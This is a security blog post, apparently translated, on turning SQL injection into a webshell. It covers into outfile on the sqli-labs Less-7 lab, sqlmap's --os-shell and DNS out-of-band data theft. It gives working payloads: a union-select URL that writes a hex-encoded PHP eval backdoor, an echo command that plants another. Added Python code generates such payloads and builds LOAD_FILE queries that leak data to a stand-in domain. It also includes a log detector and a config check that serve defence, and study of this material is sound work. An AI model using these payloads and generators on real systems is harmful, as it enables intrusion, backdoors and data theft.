
[Network security] New approaches to SQL injection: getting a webshell

2022-06-13 08:54:00 Big safe house

Preface

Many interviewers like to open with SQL injection, so I kept track of which SQL injection questions come up most often. The result was not surprising: --os-shell sits at the top of the list.

For example: how do you get a shell through SQL injection?

Answer: getshell means using SQL injection to obtain code execution on the underlying system. There are two common ways to drop a webshell: writing it with into outfile, or using sqlmap's --os-shell. UDF privilege escalation is carried out through stacked queries; MOF privilege escalation relies on older Windows versions automatically compiling .mof files dropped into the wbem directory (usually described as a race condition).

Tip: when testing an injection, check --is-dba first; if you also know the absolute path, try --os-shell. If you cannot find the admin backend, try logging in with the administrator credentials dumped from the database.

Getting a webshell

1. into outfile

Preconditions for using into outfile:

The web directory is writable by the MySQL server process, and single quotes can be used in the injection (the target path must be a quoted string)
The absolute path of the website is known (the web root, or a directory under it)
secure_file_priv has no value (check it in mysql/my.ini)

secure_file_priv: this variable limits the directory in which LOAD DATA, SELECT ... INTO DUMPFILE / INTO OUTFILE and LOAD_FILE() are allowed to read or write files.

The possible values of secure_file_priv:

NULL: mysqld refuses all file import and export
/tmp/: import and export may only take place under /tmp/
empty (no specific value): mysqld places no restriction on import and export

So to write a one-line webshell with into outfile, secure_file_priv must be empty. How do you set that (in a lab you control)?

Answer: (1) Check the current value: show global variables like '%secure%'; if it shows NULL, mysqld will refuse to import or export files.

(2) Change the value: look in mysql/my.ini for a secure_file_priv entry; if there is none, add secure_file_priv='' under [mysqld]. The variable is read-only at runtime, so restart MySQL, then query it again: the value is now empty and into outfile can be used to write the one-liner.
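As an added illustration (not from the original post), the three states above expressed as a small Python check: it reads secure_file_priv from a my.ini fragment and decides whether a given INTO OUTFILE target would pass the restriction. The ini fragments, the default values and the paths are constructed for the example.

```python
import posixpath

# Constructed my.ini fragments (not from the post): the first is the lab
# setting the post recommends, the second what a hardened server carries,
# the third leaves the option unset so the build's own default applies.
LAB_MY_INI = "[mysqld]\nport=3306\nsecure_file_priv=''\n"
HARDENED_MY_INI = "[mysqld]\nport=3306\nsecure_file_priv=/var/lib/mysql-files\n"
UNSET_MY_INI = "[mysqld]\nport=3306\n"


def read_secure_file_priv(ini_text, default):
    """Effective secure_file_priv from an ini fragment.

    Returns None for NULL (all file import/export refused), '' for no
    restriction, or the directory everything is confined to. `default` is
    the build's own default when the option is absent: '' on older servers,
    a restricted directory (or NULL) on 5.7.6+ packages.
    """
    for raw in ini_text.splitlines():
        key, _, value = raw.strip().partition("=")
        if key.strip().replace("-", "_") != "secure_file_priv":
            continue
        value = value.strip().strip("'\"")
        return None if value.upper() == "NULL" else value
    return default


def outfile_allowed(secure_file_priv, target):
    """Would SELECT ... INTO OUTFILE target pass the secure_file_priv check?

    Both paths are normalised to forward slashes so Windows and Unix paths
    compare the same way, and '..' segments are collapsed first, so a target
    that climbs out of the allowed directory is refused.
    """
    if secure_file_priv is None:          # NULL: nothing may be written
        return False
    if secure_file_priv == "":            # empty: unrestricted
        return True
    base = posixpath.normpath(secure_file_priv.replace("\\", "/"))
    path = posixpath.normpath(target.replace("\\", "/"))
    return path.startswith(base.rstrip("/") + "/")


def audit(ini_text, default, target):
    """One-line verdict for a config fragment and a candidate target path."""
    value = read_secure_file_priv(ini_text, default)
    state = "NULL" if value is None else ("empty" if value == "" else value)
    verdict = "allowed" if outfile_allowed(value, target) else "refused"
    return f"secure_file_priv={state}: INTO OUTFILE {target} {verdict}"


if __name__ == "__main__":
    shell = "C:\\phpStudy\\WWW\\outfile.php"   # assumed lab web root
    print(audit(LAB_MY_INI, "", shell))
    print(audit(HARDENED_MY_INI, "", shell))
    print(audit(UNSET_MY_INI, None, shell))
```

The hardening takeaway is the second line of output: with the directory form, a webshell under the web root is refused even when the injection itself works, and NULL refuses everything including LOAD_FILE().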

Writing the webshell (using sqli-labs Less-7 as the example)


  1. Identifying the injection point

The page only tells us whether our input produced a valid or an invalid query, so there are just two states and this is a blind injection. Entering the following confirms that the query is closed correctly:

?id=1')) --+

We keep testing with a time-based payload:

?id=3')) and sleep(5) --+


The delay occurs, so the injection point closes with ')): our input is wrapped in single quotes and then in two parentheses. The page also prints the hint "You are in.... Use outfile......", which tells us we can use SQL injection to write a one-line PHP trojan and get a shell.

  2. Determining the number of columns

Note: we use order by to determine the column count. order by 3 displays normally and order by 4 errors out, so the query has 3 columns.

  3. Writing the webshell

  • We have already obtained the web root through other means. The one-liner to write is <?php eval($_REQUEST[1]);?>. Hex-encoding it is recommended (no quotes needed); prefix the encoded bytes with 0x. The hex below decodes to exactly that one-liner, and the query writes it to outfile.php in the web root:
*   `?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\\xxxxxx\\phpStudy\\WWW\\outfile.php' --+`

Note: the path must be written with doubled backslashes, otherwise the file is not written. Inside a MySQL string literal a backslash is an escape character, so C:\phpStudy\WWW is read as C:phpStudyWWW (and \n would become a newline); \\ yields a single \ in the resulting path. The same problem arises in C and Java source, in some configuration file parsers and in web server configs, which is why doubled backslashes are the usual way to write Windows paths. Forward slashes are also accepted by Windows and avoid the issue entirely.

  4. Connecting to the webshell

Note: if secure_file_priv is NULL, the write above fails silently. In other words, when the file does not show up there are two things to check: 1. the website path is wrong, or the backslashes were not doubled; 2. secure_file_priv is not empty.
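The payload above, rebuilt as an added Python helper (not part of the original post) that hex-encodes the one-liner, quotes the path with doubled backslashes and reproduces MySQL's handling of backslash escapes, so the reason a single-backslash path fails is visible in code. The one-liner is the one from this section; the C:\phpStudy\WWW\outfile.php path is an assumption for the demonstration (the post elides part of its own path).

```python
import binascii


def mysql_unescape(literal):
    """Interpret backslash escapes the way MySQL does inside a quoted string.

    Only a handful of sequences are special (0 ' " b n r t Z \\ % _); any
    other backslash-c pair collapses to c, which is what silently eats the
    separators of a Windows path written with single backslashes.
    """
    special = {"0": "\0", "'": "'", '"': '"', "b": "\b", "n": "\n", "r": "\r",
               "t": "\t", "Z": "\x1a", "\\": "\\", "%": "\\%", "_": "\\_"}
    out, i = [], 0
    while i < len(literal):
        ch = literal[i]
        if ch == "\\" and i + 1 < len(literal):
            out.append(special.get(literal[i + 1], literal[i + 1]))
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def php_hex_literal(php):
    """Hex-encode a PHP one-liner so the injected query needs no quotes around it."""
    return "0x" + binascii.hexlify(php.encode()).decode()


def mysql_path_literal(path):
    """Quote a filesystem path for INTO OUTFILE, doubling every backslash."""
    return "'" + path.replace("\\", "\\\\").replace("'", "\\'") + "'"


def outfile_payload(php, path, columns, payload_column):
    """UNION ... INTO OUTFILE fragment for a query with `columns` columns.

    The one-liner goes in `payload_column`; the other cells are numeric
    filler, as in the post's three-column Less-7 query.
    """
    cells = [str(i) for i in range(1, columns + 1)]
    cells[payload_column - 1] = php_hex_literal(php)
    return "union select " + ",".join(cells) + " into outfile " + mysql_path_literal(path)


def less7_url(php, path):
    """Complete Less-7 query string: id is wrapped as (('...')) server-side, so ')) closes it."""
    return "?id=-3')) " + outfile_payload(php, path, columns=3, payload_column=2) + " --+"


# Assumed lab web root (constructed for the example) and the post's one-liner.
WEB_ROOT_FILE = "C:\\phpStudy\\WWW\\outfile.php"
ONE_LINER = "<?php eval($_REQUEST[1]);?>"

if __name__ == "__main__":
    print(less7_url(ONE_LINER, WEB_ROOT_FILE))
    # What MySQL actually sees when the path is not escaped: separators vanish.
    print(repr(mysql_unescape("C:\\phpStudy\\WWW\\outfile.php")))
    print(repr(mysql_unescape(mysql_path_literal(WEB_ROOT_FILE)[1:-1])))
```

mysql_unescape is the part worth keeping around: run any path you plan to inject through it and the result is the file name the server will try to create.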

2. How --os-shell works

The general idea of --os-shell is to write a script into the database (or into a log), generate the corresponding code file on disk, and then run commands through the resulting shell. In the web-backdoor mode described here it is not a UDF privilege escalation: sqlmap uses into outfile to write two files to the web server, one that executes system commands and one that uploads files.

Conditions

DBA privileges are required (check with --is-dba; phpStudy installations generally run MySQL as a DBA account)
PHP's automatic escaping is off (magic_quotes_gpc off), so single and double quotes can be used (the path must be a quoted string; 0x encoding cannot be used for it)
The absolute path of the website is known; into outfile cannot overwrite an existing file, so the target file must not already exist

secure_file_priv has no value (this is the key to whether --os-shell works at all). secure_file_priv limits the directory in which LOAD DATA, SELECT ... INTO OUTFILE and LOAD_FILE() may operate; the option itself is not new, but since MySQL 5.7.6 its default restricts file operations, which is why older servers tend to have it empty and newer ones do not

  • when secure_file_priv is NULL, mysqld refuses all import and export
  • when secure_file_priv is /tmp, mysqld only imports and exports under /tmp and nowhere else
  • when secure_file_priv is empty, mysqld may import and export in any directory

Note: secure_file_priv is read-only; it cannot be changed with set global. Add secure_file_priv='' to my.cnf or my.ini and restart MySQL.

sqlmap generates two files in the directory you specify (the names are random, not fixed), for example:
tmpbeewq.php, used to execute system commands
tmpuqvgw.php, used to upload files
Again, secure_file_priv must have no value (check in mysql/my.ini)
magic_quotes_gpc: applies on the web server side to GET, POST and COOKIE data and takes effect at the start of the request (the feature was removed in PHP 5.4)

Steps with sqlmap

1. Log in with a weak password
2. Capture the request
3. Save the captured request as OAlogin.txt (a text file) in the sqlmap directory
4. Start sqlmap: sqlmap -r OAlogin.txt --os-shell
5. Choose the web language (ASP, ASPX, JSP, PHP)
6. Enter the absolute path of the web root
7. Write the trojan file

  7.1: pwd  // show the current directory
  7.2: echo '<?php @eval($_POST["a"]); ?>' >> 123.php  // append the one-liner to 123.php (double quotes inside, so the shell's single quotes stay balanced)
  7.3: cat 123.php  // print the contents of 123.php

8. Connect with a webshell client
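For the defensive side, an added example (not from the post and not sqlmap's own code) of what the --os-shell procedure looks like in a web server access log: the into outfile write, then requests to the two randomly named stager files. The log lines are constructed; the stager names follow the tmpb*/tmpu* pattern shown above, and the cmd parameter is an assumption about how the command file is driven.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed Apache combined-format lines (not real traffic). Line 2 is the
# INTO OUTFILE write, lines 3 and 4 hit the uploader and the command file.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [13/Jun/2022:08:54:00 +0800] "GET /Less-7/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [13/Jun/2022:08:54:01 +0800] "GET /Less-7/?id=-3%27%29%29%20union%20select%201%2C0x3c3f70687020%2C3%20into%20outfile%20%27C%3A%5C%5CphpStudy%5C%5CWWW%5C%5Coutfile.php%27%20--+ HTTP/1.1" 200 512 "-" "sqlmap/1.6"
10.0.0.5 - - [13/Jun/2022:08:54:02 +0800] "GET /tmpuqvgw.php HTTP/1.1" 200 300 "-" "sqlmap/1.6"
10.0.0.5 - - [13/Jun/2022:08:54:03 +0800] "POST /tmpbeewq.php?cmd=whoami HTTP/1.1" 200 80 "-" "sqlmap/1.6"
10.0.0.9 - - [13/Jun/2022:09:00:00 +0800] "GET /index.php?page=tmp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# File primitives that should never appear in a legitimate query string.
FILE_OP_RE = re.compile(r"into\s+(?:out|dump)file|load_file\s*\(", re.I)
# tmp + five random letters + .php, the naming the post shows for both stagers.
STAGER_RE = re.compile(r"/tmp[a-z]{5}\.php$", re.I)


def inspect_access_log(text):
    """Return (line number, client ip, path, reasons) for every suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line
        raw_path, _, raw_query = m.group("target").partition("?")
        path = unquote(raw_path)           # decode once; %-encoded stager names still match
        query = unquote_plus(raw_query)
        reasons = []
        if FILE_OP_RE.search(query):
            reasons.append("file read/write primitive in query string")
        if STAGER_RE.search(path):
            reasons.append("request to sqlmap-style stager name")
        if "sqlmap" in m.group("ua").lower():
            reasons.append("sqlmap user agent")
        if reasons:
            findings.append((lineno, m.group("ip"), path, reasons))
    return findings


if __name__ == "__main__":
    for lineno, ip, path, reasons in inspect_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {lineno} {ip} {path}: {'; '.join(reasons)}")
```

The user-agent rule is the weakest of the three (sqlmap's --random-agent defeats it); the file-primitive rule and a file-integrity alert on new .php files under the web root are what actually catch this, and the same regexes make a reasonable WAF rule.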

Path problems (and DNS out-of-band queries)

What causes the path problem?

Answer: most SQL injection shell-writing methods require the absolute path of the website. Not because outfile cannot write to a relative path (it can; a relative path is taken relative to the MySQL data directory), but because without the path the resulting webshell cannot be reached, so a shell written to a relative path is practically useless, or the write fails for lack of permission.

DNS log injection: DNS out-of-band querying is a MySQL injection technique in which the data we want is embedded in a hostname, so that it shows up in the DNS resolution records of a domain we control.


Why do we need it?

Answer: when a union query cannot return data directly, we are left with blind injection and have to extract data bit by bit. Manual blind injection takes a long time. You might think of running sqlmap to dump the data directly, but in real tests sqlmap's blind-injection traffic often gets your IP blocked, which slows the engagement down.

The LOAD_FILE() function: LOAD_FILE() reads a file and returns its contents as a string.

Syntax: load_file(file_name), where file_name is the full path of the file.

The function only works when the following conditions hold:

1. The file must exist on the server host

2. You must have the FILE privilege to read it. A user with the FILE privilege can read any file on the server host that is world-readable or readable by the MySQL server, subject to secure_file_priv

3. The file must be readable by everyone and smaller than max_allowed_packet bytes
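As an added example (not from the original post) of how LOAD_FILE() becomes the DNS out-of-band channel mentioned above on a Windows MySQL host: a UNC path (two leading backslashes, then a host name) makes the server resolve that host, so placing HEX() of the wanted value in the leftmost label of a domain you control leaks it through your resolver's log. oob.example is a hypothetical domain, the resolver log lines are constructed, and the second function decodes them. Because LOAD_FILE() is subject to secure_file_priv, a NULL value blocks this channel as well.

```python
import binascii
import re

# Hypothetical attacker-controlled zone (assumption; not from the post).
OOB_DOMAIN = "oob.example"


def dns_exfil_query(expr, start=1, length=31, domain=OOB_DOMAIN):
    """Build the MySQL statement that leaks `length` bytes of `expr` via DNS.

    The leaked bytes are HEX()-encoded so they are valid hostname characters
    and cut to 31 bytes, because one DNS label holds at most 63 characters
    (62 hex digits). Inside the MySQL string literal every backslash has to
    be doubled, so the UNC prefix is written with four and the trailing
    separator with two.
    """
    return (
        "SELECT LOAD_FILE(CONCAT('\\\\\\\\', "
        f"HEX(SUBSTR(({expr}),{start},{length})), "
        f"'.{domain}\\\\x'))"
    )


def dns_exfil_queries(expr, total_len, chunk=31, domain=OOB_DOMAIN):
    """One query per label until `total_len` bytes of the value are covered."""
    return [dns_exfil_query(expr, s, chunk, domain)
            for s in range(1, total_len + 1, chunk)]


# Constructed BIND-style query log lines (not real traffic). The first label is
# HEX('root@localhost') as the injected query would produce it.
SAMPLE_RESOLVER_LOG = [
    "13-Jun-2022 08:55:01.123 client 203.0.113.7#53124: query: "
    "726F6F74406C6F63616C686F7374.oob.example IN A + (198.51.100.2)",
    "13-Jun-2022 08:55:02.456 client 203.0.113.9#4123: query: "
    "www.example.com IN A + (198.51.100.2)",
]


def decode_dns_log(lines, domain=OOB_DOMAIN):
    """Recover leaked values from resolver log lines that hit `domain`.

    Resolvers may lowercase or randomise label case, so both cases are
    accepted; odd-length labels are skipped since they cannot be HEX() output.
    """
    label_re = re.compile(r"\b([0-9A-Fa-f]{2,62})\." + re.escape(domain) + r"\b")
    values = []
    for line in lines:
        m = label_re.search(line)
        if not m or len(m.group(1)) % 2:
            continue
        values.append(binascii.unhexlify(m.group(1)).decode("utf-8", errors="replace"))
    return values


if __name__ == "__main__":
    for q in dns_exfil_queries("SELECT user()", 40):
        print(q)
    print(decode_dns_log(SAMPLE_RESOLVER_LOG))
```

The statement is used as a subquery inside the injection point; the value it returns is irrelevant (the file never exists), the lookup itself is the channel. On the monitoring side, a database host that resolves long hex-looking labels under an unfamiliar domain is a strong signal, and DB servers normally have no business resolving external names at all.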

Original source: https://yzsam.com/2022/164/202206130850448237.html

Copyright notice: this article was written by [Big safe house]; please include the original link when reposting.